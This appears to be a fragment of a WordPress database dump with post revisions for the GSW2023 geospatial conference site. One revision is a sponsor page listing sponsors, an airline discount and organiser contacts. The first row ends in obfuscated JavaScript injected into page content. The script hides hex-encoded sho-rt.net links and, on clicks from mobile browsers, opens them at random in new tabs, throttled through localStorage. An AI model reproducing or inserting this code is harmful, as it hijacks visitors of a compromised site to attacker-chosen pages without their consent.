_0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:37:49','2023-08-30 17:37:49','',3066,'https://gsw2023.com/?p=5444',0,'revision','',0),
(5445,1,'2023-08-30 17:39:05','2023-08-30 17:39:05','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner 